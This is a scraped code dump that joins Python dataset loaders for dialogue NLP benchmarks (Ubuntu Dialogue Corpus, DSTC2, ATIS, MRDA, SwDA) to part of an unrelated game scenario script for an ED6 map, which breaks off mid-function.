The UDCv1 dataset is using in task Dialogue Response Selection.
The source dataset is UDCv1(Ubuntu Dialogue Corpus v1.0). See detail at
http://dataset.cs.mcgill.ca/ubuntu-corpus-1.0/
"""
MAX_LEN_OF_RESPONSE = 60
LABEL_MAP = get_label_map(['0', '1'])
def __init__(self, data_dir, mode='train', label_map_config=None):
super(UDCv1, self).__init__()
self._data_dir = data_dir
self._mode = mode
self.read_data()
self.label_map = None
if label_map_config:
with open(label_map_config) as f:
self.label_map = json.load(f)
else:
self.label_map = None
#read data from file
def read_data(self):
"""read data from file"""
if self._mode == 'train':
data_path = os.path.join(self._data_dir, 'train.txt')
elif self._mode == 'dev':
data_path = os.path.join(self._data_dir, 'dev.txt-small')
elif self._mode == 'test':
data_path = os.path.join(self._data_dir, 'test.txt')
self.data = []
with open(data_path, 'r', encoding='utf8') as fin:
for line in fin:
if not line:
continue
arr = line.rstrip('\n').split('\t')
if len(arr) < 3:
print('Data format error: %s' % '\t'.join(arr))
print(
'Data row contains at least three parts: label\tconversation1\t.....\tresponse.'
)
continue
label = arr[0]
text_a = arr[1:-1]
text_b = arr[-1]
self.data.append([label, text_a, text_b])
@classmethod
def get_label(cls, label):
return cls.LABEL_MAP[label]
@classmethod
def num_classes(cls):
return len(cls.LABEL_MAP)
@classmethod
def convert_example(cls, example, tokenizer, max_seq_length=512):
""" Convert a glue example into necessary features. """
def _truncate_and_concat(text_a: List[str], text_b: str, tokenizer, max_seq_length):
tokens_b = tokenizer.tokenize(text_b)
tokens_b = tokens_b[:min(cls.MAX_LEN_OF_RESPONSE, len(tokens_b))]
tokens_a = []
for text in text_a:
tokens_a.extend(tokenizer.tokenize(text))
tokens_a.append(INNER_SEP)
tokens_a = tokens_a[:-1]
if len(tokens_a) > max_seq_length - len(tokens_b) - 3:
tokens_a = tokens_a[len(tokens_a) - max_seq_length + len(tokens_b) + 3:]
tokens, segment_ids = [], []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
return input_ids, input_mask, segment_ids
label, text_a, text_b = example
label = np.array([cls.get_label(label)], dtype='int64')
input_ids, input_mask, segment_ids = _truncate_and_concat(text_a, text_b, tokenizer, max_seq_length)
return input_ids, input_mask, segment_ids, label
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return len(self.data)
class DSTC2(Dataset):
"""
The dataset DSTC2 is using in task Dialogue State Tracking.
The source dataset is DSTC2(Dialog State Tracking Challenges 2). See detail at
https://github.com/matthen/dstc
"""
LABEL_MAP = get_label_map([str(i) for i in range(217)])
def __init__(self, data_dir, mode='train'):
super(DSTC2, self).__init__()
self._data_dir = data_dir
self._mode = mode
self.read_data()
def read_data(self):
"""read data from file"""
def _concat_dialogues(examples):
"""concat multi turns dialogues"""
new_examples = []
max_turns = 20
example_len = len(examples)
for i in range(example_len):
multi_turns = examples[max(i - max_turns, 0):i + 1]
new_qa = '\1'.join([example[0] for example in multi_turns])
new_examples.append((new_qa.split('\1'), examples[i][1]))
return new_examples
if self._mode == 'train':
data_path = os.path.join(self._data_dir, 'train.txt')
elif self._mode == 'dev':
data_path = os.path.join(self._data_dir, 'dev.txt')
elif self._mode == 'test':
data_path = os.path.join(self._data_dir, 'test.txt')
self.data = []
with open(data_path, 'r', encoding='utf8') as fin:
pre_idx = -1
examples = []
for line in fin:
if not line:
continue
arr = line.rstrip('\n').split('\t')
if len(arr) != 3:
print('Data format error: %s' % '\t'.join(arr))
print(
'Data row should contains three parts: id\tquestion\1answer\tlabel1 label2 ...'
)
continue
idx = arr[0]
qa = arr[1]
label_list = arr[2].split()
if idx != pre_idx:
if idx != 0:
examples = _concat_dialogues(examples)
self.data.extend(examples)
examples = []
pre_idx = idx
examples.append((qa, label_list))
if examples:
examples = _concat_dialogues(examples)
self.data.extend(examples)
@classmethod
def get_label(cls, label):
return cls.LABEL_MAP[label]
@classmethod
def num_classes(cls):
return len(cls.LABEL_MAP)
@classmethod
def convert_example(cls, example, tokenizer, max_seq_length=512):
""" Convert a glue example into necessary features. """
def _truncate_and_concat(texts: List[str], tokenizer, max_seq_length):
tokens = []
for text in texts:
tokens.extend(tokenizer.tokenize(text))
tokens.append(INNER_SEP)
tokens = tokens[:-1]
if len(tokens) > max_seq_length - 2:
tokens = tokens[len(tokens) - max_seq_length + 2:]
tokens_, segment_ids = [], []
tokens_.append("[CLS]")
segment_ids.append(0)
for token in tokens:
tokens_.append(token)
segment_ids.append(0)
tokens_.append("[SEP]")
segment_ids.append(0)
tokens = tokens_
input_ids = tokenizer.convert_tokens_to_ids(tokens)
return input_ids, segment_ids
texts, labels = example
input_ids, segment_ids = _truncate_and_concat(texts, tokenizer,
max_seq_length)
labels = [cls.get_label(l) for l in labels]
label = np.zeros(cls.num_classes(), dtype='int64')
for l in labels:
label[l] = 1
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
return input_ids, input_mask, segment_ids, label
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return len(self.data)
class ATIS_DSF(Dataset):
"""
The dataset ATIS_DSF is using in task Dialogue Slot Filling.
The source dataset is ATIS(Airline Travel Information System). See detail at
https://www.kaggle.com/siddhadev/ms-cntk-atis
"""
LABEL_MAP = get_label_map([str(i) for i in range(130)])
def __init__(self, data_dir, mode='train'):
super(ATIS_DSF, self).__init__()
self._data_dir = data_dir
self._mode = mode
self.read_data()
def read_data(self):
"""read data from file"""
if self._mode == 'train':
data_path = os.path.join(self._data_dir, 'train.txt')
elif self._mode == 'dev':
data_path = os.path.join(self._data_dir, 'dev.txt')
elif self._mode == 'test':
data_path = os.path.join(self._data_dir, 'test.txt')
self.data = []
with open(data_path, 'r', encoding='utf8') as fin:
for line in fin:
if not line:
continue
arr = line.rstrip('\n').split('\t')
if len(arr) != 2:
print('Data format error: %s' % '\t'.join(arr))
print(
'Data row should contains two parts: conversation_content\tlabel1 label2 label3.'
)
continue
text = arr[0]
label_list = arr[1].split()
self.data.append([text, label_list])
@classmethod
def get_label(cls, label):
return cls.LABEL_MAP[label]
@classmethod
def num_classes(cls):
return len(cls.LABEL_MAP)
@classmethod
def convert_example(cls, example, tokenizer, max_seq_length=512):
""" Convert a glue example into necessary features. """
text, labels = example
tokens, label_list = [], []
words = text.split()
assert len(words) == len(labels)
for word, label in zip(words, labels):
piece_words = tokenizer.tokenize(word)
tokens.extend(piece_words)
label = cls.get_label(label)
label_list.extend([label] * len(piece_words))
if len(tokens) > max_seq_length - 2:
tokens = tokens[len(tokens) - max_seq_length + 2:]
label_list = label_list[len(tokens) - max_seq_length + 2:]
tokens_, segment_ids = [], []
tokens_.append("[CLS]")
for token in tokens:
tokens_.append(token)
tokens_.append("[SEP]")
tokens = tokens_
label_list = [0] + label_list + [0]
segment_ids = [0] * len(tokens)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
label = np.array(label_list, dtype='int64')
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
return input_ids, input_mask, segment_ids, label
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return len(self.data)
class ATIS_DID(Dataset):
"""
The dataset ATIS_ID is using in task Dialogue Intent Detection.
The source dataset is ATIS(Airline Travel Information System). See detail at
https://www.kaggle.com/siddhadev/ms-cntk-atis
"""
LABEL_MAP = get_label_map([str(i) for i in range(26)])
def __init__(self, data_dir, mode='train'):
super(ATIS_DID, self).__init__()
self._data_dir = data_dir
self._mode = mode
self.read_data()
def read_data(self):
"""read data from file"""
if self._mode == 'train':
data_path = os.path.join(self._data_dir, 'train.txt')
elif self._mode == 'dev':
data_path = os.path.join(self._data_dir, 'dev.txt')
elif self._mode == 'test':
data_path = os.path.join(self._data_dir, 'test.txt')
self.data = []
with open(data_path, 'r', encoding='utf8') as fin:
for line in fin:
if not line:
continue
arr = line.rstrip('\n').split('\t')
if len(arr) != 2:
print('Data format error: %s' % '\t'.join(arr))
print(
'Data row should contains two parts: label\tconversation_content.'
)
continue
label = arr[0]
text = arr[1]
self.data.append([label, text])
@classmethod
def get_label(cls, label):
return cls.LABEL_MAP[label]
@classmethod
def num_classes(cls):
return len(cls.LABEL_MAP)
@classmethod
def convert_example(cls, example, tokenizer, max_seq_length=512):
""" Convert a glue example into necessary features. """
label, text = example
tokens = tokenizer.tokenize(text)
if len(tokens) > max_seq_length - 2:
tokens = tokens[len(tokens) - max_seq_length + 2:]
tokens_, segment_ids = [], []
tokens_.append("[CLS]")
for token in tokens:
tokens_.append(token)
tokens_.append("[SEP]")
tokens = tokens_
segment_ids = [0] * len(tokens)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
label = np.array([cls.get_label(label)], dtype='int64')
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
return input_ids, input_mask, segment_ids, label
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return len(self.data)
def read_da_data(data_dir, mode):
"""read data from file"""
def _concat_dialogues(examples):
"""concat multi turns dialogues"""
new_examples = []
example_len = len(examples)
for i in range(example_len):
label, caller, text = examples[i]
cur_txt = "%s : %s" % (caller, text)
pre_txt = [
"%s : %s" % (item[1], item[2])
for item in examples[max(0, i - 5):i]
]
suf_txt = [
"%s : %s" % (item[1], item[2])
for item in examples[i + 1:min(len(examples), i + 3)]
]
sample = [label, pre_txt, cur_txt, suf_txt]
new_examples.append(sample)
return new_examples
if mode == 'train':
data_path = os.path.join(data_dir, 'train.txt')
elif mode == 'dev':
data_path = os.path.join(data_dir, 'dev.txt')
elif mode == 'test':
data_path = os.path.join(data_dir, 'test.txt')
data = []
with open(data_path, 'r', encoding='utf8') as fin:
pre_idx = -1
examples = []
for line in fin:
if not line:
continue
arr = line.rstrip('\n').split('\t')
if len(arr) != 4:
print('Data format error: %s' % '\t'.join(arr))
print(
'Data row should contains four parts: id\tlabel\tcaller\tconversation_content.'
)
continue
idx, label, caller, text = arr
if idx != pre_idx:
if idx != 0:
examples = _concat_dialogues(examples)
data.extend(examples)
examples = []
pre_idx = idx
examples.append((label, caller, text))
if examples:
examples = _concat_dialogues(examples)
data.extend(examples)
return data
def truncate_and_concat(pre_txt: List[str],
cur_txt: str,
suf_txt: List[str],
tokenizer,
max_seq_length,
max_len_of_cur_text):
"""concat data"""
cur_tokens = tokenizer.tokenize(cur_txt)
cur_tokens = cur_tokens[:min(max_len_of_cur_text, len(cur_tokens))]
pre_tokens = []
for text in pre_txt:
pre_tokens.extend(tokenizer.tokenize(text))
pre_tokens.append(INNER_SEP)
pre_tokens = pre_tokens[:-1]
suf_tokens = []
for text in suf_txt:
suf_tokens.extend(tokenizer.tokenize(text))
suf_tokens.append(INNER_SEP)
suf_tokens = suf_tokens[:-1]
if len(cur_tokens) + len(pre_tokens) + len(suf_tokens) > max_seq_length - 4:
left_num = max_seq_length - 4 - len(cur_tokens)
if len(pre_tokens) > len(suf_tokens):
suf_num = int(left_num / 2)
suf_tokens = suf_tokens[:suf_num]
pre_num = left_num - len(suf_tokens)
pre_tokens = pre_tokens[max(0, len(pre_tokens) - pre_num):]
else:
pre_num = int(left_num / 2)
pre_tokens = pre_tokens[max(0, len(pre_tokens) - pre_num):]
suf_num = left_num - len(pre_tokens)
suf_tokens = suf_tokens[:suf_num]
tokens, segment_ids = [], []
tokens.append("[CLS]")
for token in pre_tokens:
tokens.append(token)
tokens.append("[SEP]")
segment_ids.extend([0] * len(tokens))
for token in cur_tokens:
tokens.append(token)
tokens.append("[SEP]")
segment_ids.extend([1] * (len(cur_tokens) + 1))
if suf_tokens:
for token in suf_tokens:
tokens.append(token)
tokens.append("[SEP]")
segment_ids.extend([0] * (len(suf_tokens) + 1))
input_ids = tokenizer.convert_tokens_to_ids(tokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
return input_ids, input_mask, segment_ids
class MRDA(Dataset):
"""
The dataset MRDA is using in task Dialogue Act.
The source dataset is MRDA(Meeting Recorder Dialogue Act). See detail at
https://www.aclweb.org/anthology/W04-2319.pdf
"""
MAX_LEN_OF_CUR_TEXT = 50
LABEL_MAP = get_label_map([str(i) for i in range(5)])
def __init__(self, data_dir, mode='train'):
super(MRDA, self).__init__()
self.data = read_da_data(data_dir, mode)
@classmethod
def get_label(cls, label):
return cls.LABEL_MAP[label]
@classmethod
def num_classes(cls):
return len(cls.LABEL_MAP)
@classmethod
def convert_example(cls, example, tokenizer, max_seq_length=512):
""" Convert a glue example into necessary features. """
label, pre_txt, cur_txt, suf_txt = example
label = np.array([cls.get_label(label)], dtype='int64')
input_ids, input_mask, segment_ids = truncate_and_concat(pre_txt, cur_txt, suf_txt, \
tokenizer, max_seq_length, cls.MAX_LEN_OF_CUR_TEXT)
return input_ids, input_mask, segment_ids, label
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return len(self.data)
class SwDA(Dataset):
"""
The dataset SwDA is using in task Dialogue Act.
The source dataset is SwDA(Switchboard Dialog Act). See detail at
http://compprag.christopherpotts.net/swda.html
"""
MAX_LEN_OF_CUR_TEXT = 50
LABEL_MAP = get_label_map([str(i) for i in range(42)])
def __init__(self, data_dir, mode='train'):
super(SwDA, self).__init__()
self.data = read_da_data(data_dir, mode)
@classmethod
def get_label(cls, label):
return cls.LABEL_MAP[label]
@classmethod
def num_classes(cls):
return len(cls.LABEL_MAP)
@classmethod
def convert_example(cls, example, tokenizer, max_seq_length=512):
""" Convert a glue example into necessary features. """
label, pre_txt, cur_txt, suf_txt = example
label = np.array([cls.get_label(label)], dtype='int64')
input_ids, input_mask, segment_ids = truncate_and_concat(pre_txt, cur_txt, suf_txt, \
tokenizer, max_seq_length, cls.MAX_LEN_OF_CUR_TEXT)
return input_ids, input_mask, segment_ids, label
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return len(self.data)
| [
"[email protected]"
] | |
fe617ba47c9efdffab6c275fdc564daa8bb65ee9 | 80301f1cffc5afce13256e2ecab6323c5df00194 | /cn.3rd/py/A0024.py | 35dc33ee31bc4810216c072c4f632d116a8f110f | [] | no_license | ZhenjianYang/SoraVoiceScripts | c1ddf7c1bbcb933243754f9669bd6b75777c87b9 | 94a948090aba0f63b10b2c69dc845dc99c822fc4 | refs/heads/master | 2023-04-18T04:54:44.306652 | 2023-04-06T11:15:17 | 2023-04-06T11:15:17 | 103,167,541 | 43 | 11 | null | 2021-03-06T08:52:54 | 2017-09-11T17:36:55 | Python | UTF-8 | Python | false | false | 27,855 | py | from ED63RDScenarioHelper import *
def main():
SetCodePage("gbk")
# 调试地图
CreateScenaFile(
FileName = 'A0024 ._SN',
MapName = 'map1',
Location = 'T0030.x',
MapIndex = 1,
MapDefaultBGM = "ed60010",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'04580尤莉亚待机', # 9
'04581尤莉亚移动', # 10
'04582尤莉亚攻击', # 11
'04583尤莉亚被弹开', # 12
'04584尤莉亚倒下', # 13
'04585尤莉亚魔法咏唱', # 14
'04586尤莉亚魔法发动', # 15
'04570穆拉待机', # 16
'04571穆拉移动', # 17
'04572穆拉攻击', # 18
'04573穆拉被弹开', # 19
'04574穆拉倒下', # 20
'04575穆拉魔法咏唱', # 21
'04576穆拉魔法发动', # 22
'04590希德待机', # 23
'04591希德移动', # 24
'04592希德攻击', # 25
'04593希德被弹开', # 26
'04594希德倒下', # 27
'04595希德魔法咏唱', # 28
'04596希德魔法发动', # 29
'04120凯诺娜待机', # 30
'04121凯诺娜移动', # 31
'04122凯诺娜攻击', # 32
'04123凯诺娜被弹开', # 33
'04124凯诺娜倒下', # 34
'04125凯诺娜魔法咏唱', # 35
'04126凯诺娜魔法发动', # 36
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 0,
Unknown_0C = 4,
Unknown_0E = 5,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 315,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 0,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT27/CH04580 ._CH', # 00
'ED6_DT27/CH04581 ._CH', # 01
'ED6_DT27/CH04582 ._CH', # 02
'ED6_DT27/CH04583 ._CH', # 03
'ED6_DT27/CH04584 ._CH', # 04
'ED6_DT27/CH04585 ._CH', # 05
'ED6_DT27/CH04586 ._CH', # 06
'ED6_DT27/CH04583 ._CH', # 07
'ED6_DT27/CH04583 ._CH', # 08
'ED6_DT27/CH04583 ._CH', # 09
'ED6_DT27/CH04570 ._CH', # 0A
'ED6_DT27/CH04571 ._CH', # 0B
'ED6_DT27/CH04572 ._CH', # 0C
'ED6_DT27/CH04573 ._CH', # 0D
'ED6_DT27/CH04574 ._CH', # 0E
'ED6_DT27/CH04575 ._CH', # 0F
'ED6_DT27/CH04576 ._CH', # 10
'ED6_DT27/CH04573 ._CH', # 11
'ED6_DT27/CH04573 ._CH', # 12
'ED6_DT27/CH04573 ._CH', # 13
'ED6_DT27/CH04590 ._CH', # 14
'ED6_DT27/CH04591 ._CH', # 15
'ED6_DT27/CH04592 ._CH', # 16
'ED6_DT27/CH04593 ._CH', # 17
'ED6_DT27/CH04594 ._CH', # 18
'ED6_DT27/CH04595 ._CH', # 19
'ED6_DT27/CH04596 ._CH', # 1A
'ED6_DT27/CH04593 ._CH', # 1B
'ED6_DT27/CH04593 ._CH', # 1C
'ED6_DT27/CH04593 ._CH', # 1D
'ED6_DT27/CH04120 ._CH', # 1E
'ED6_DT27/CH04121 ._CH', # 1F
'ED6_DT27/CH04122 ._CH', # 20
'ED6_DT27/CH04123 ._CH', # 21
'ED6_DT27/CH04124 ._CH', # 22
'ED6_DT27/CH04125 ._CH', # 23
'ED6_DT27/CH04126 ._CH', # 24
'ED6_DT27/CH04123 ._CH', # 25
'ED6_DT27/CH04123 ._CH', # 26
'ED6_DT27/CH04123 ._CH', # 27
)
AddCharChipPat(
'ED6_DT27/CH04580P._CP', # 00
'ED6_DT27/CH04581P._CP', # 01
'ED6_DT27/CH04582P._CP', # 02
'ED6_DT27/CH04583P._CP', # 03
'ED6_DT27/CH04584P._CP', # 04
'ED6_DT27/CH04585P._CP', # 05
'ED6_DT27/CH04586P._CP', # 06
'ED6_DT27/CH04583P._CP', # 07
'ED6_DT27/CH04583P._CP', # 08
'ED6_DT27/CH04583P._CP', # 09
'ED6_DT27/CH04570P._CP', # 0A
'ED6_DT27/CH04571P._CP', # 0B
'ED6_DT27/CH04572P._CP', # 0C
'ED6_DT27/CH04573P._CP', # 0D
'ED6_DT27/CH04574P._CP', # 0E
'ED6_DT27/CH04575P._CP', # 0F
'ED6_DT27/CH04576P._CP', # 10
'ED6_DT27/CH04573P._CP', # 11
'ED6_DT27/CH04573P._CP', # 12
'ED6_DT27/CH04573P._CP', # 13
'ED6_DT27/CH04590P._CP', # 14
'ED6_DT27/CH04591P._CP', # 15
'ED6_DT27/CH04592P._CP', # 16
'ED6_DT27/CH04593P._CP', # 17
'ED6_DT27/CH04594P._CP', # 18
'ED6_DT27/CH04595P._CP', # 19
'ED6_DT27/CH04596P._CP', # 1A
'ED6_DT27/CH04593P._CP', # 1B
'ED6_DT27/CH04593P._CP', # 1C
'ED6_DT27/CH04593P._CP', # 1D
'ED6_DT27/CH04120P._CP', # 1E
'ED6_DT27/CH04121P._CP', # 1F
'ED6_DT27/CH04122P._CP', # 20
'ED6_DT27/CH04123P._CP', # 21
'ED6_DT27/CH04124P._CP', # 22
'ED6_DT27/CH04125P._CP', # 23
'ED6_DT27/CH04126P._CP', # 24
'ED6_DT27/CH04123P._CP', # 25
'ED6_DT27/CH04123P._CP', # 26
'ED6_DT27/CH04123P._CP', # 27
)
DeclNpc(
X = 4000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x1,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 2,
ChipIndex = 0x2,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 3,
ChipIndex = 0x3,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 4,
ChipIndex = 0x4,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 5,
ChipIndex = 0x5,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 4000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 6,
ChipIndex = 0x6,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 7,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 10,
ChipIndex = 0xA,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 11,
ChipIndex = 0xB,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 12,
ChipIndex = 0xC,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 13,
ChipIndex = 0xD,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 14,
ChipIndex = 0xE,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 15,
ChipIndex = 0xF,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 8000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 16,
ChipIndex = 0x10,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 8,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 20,
ChipIndex = 0x14,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 21,
ChipIndex = 0x15,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 22,
ChipIndex = 0x16,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 23,
ChipIndex = 0x17,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 24,
ChipIndex = 0x18,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 25,
ChipIndex = 0x19,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 12000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 26,
ChipIndex = 0x1A,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 9,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 4000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 30,
ChipIndex = 0x1E,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 8000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 31,
ChipIndex = 0x1F,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 12000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 32,
ChipIndex = 0x20,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 16000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 33,
ChipIndex = 0x21,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 4,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 20000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 34,
ChipIndex = 0x22,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 5,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 24000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 35,
ChipIndex = 0x23,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 6,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
DeclNpc(
X = 16000,
Z = 0,
Y = 28000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 36,
ChipIndex = 0x24,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 11,
TalkFunctionIndex = 0,
TalkScenaIndex = 12,
)
ScpFunction(
"Function_0_56A", # 00, 0
"Function_1_56B", # 01, 1
"Function_2_56C", # 02, 2
"Function_3_582", # 03, 3
"Function_4_598", # 04, 4
"Function_5_5B3", # 05, 5
"Function_6_5CE", # 06, 6
"Function_7_61B", # 07, 7
"Function_8_6D7", # 08, 8
"Function_9_793", # 09, 9
"Function_10_84F", # 0A, 10
"Function_11_865", # 0B, 11
"Function_12_921", # 0C, 12
)
def Function_0_56A(): pass
label("Function_0_56A")
Return()
# Function_0_56A end
def Function_1_56B(): pass
label("Function_1_56B")
Return()
# Function_1_56B end
def Function_2_56C(): pass
label("Function_2_56C")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_581")
OP_99(0xFE, 0x0, 0x7, 0x640)
Jump("Function_2_56C")
label("loc_581")
Return()
# Function_2_56C end
def Function_3_582(): pass
label("Function_3_582")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_597")
OP_99(0xFE, 0x0, 0x7, 0x7D0)
Jump("Function_3_582")
label("loc_597")
Return()
# Function_3_582 end
def Function_4_598(): pass
label("Function_4_598")
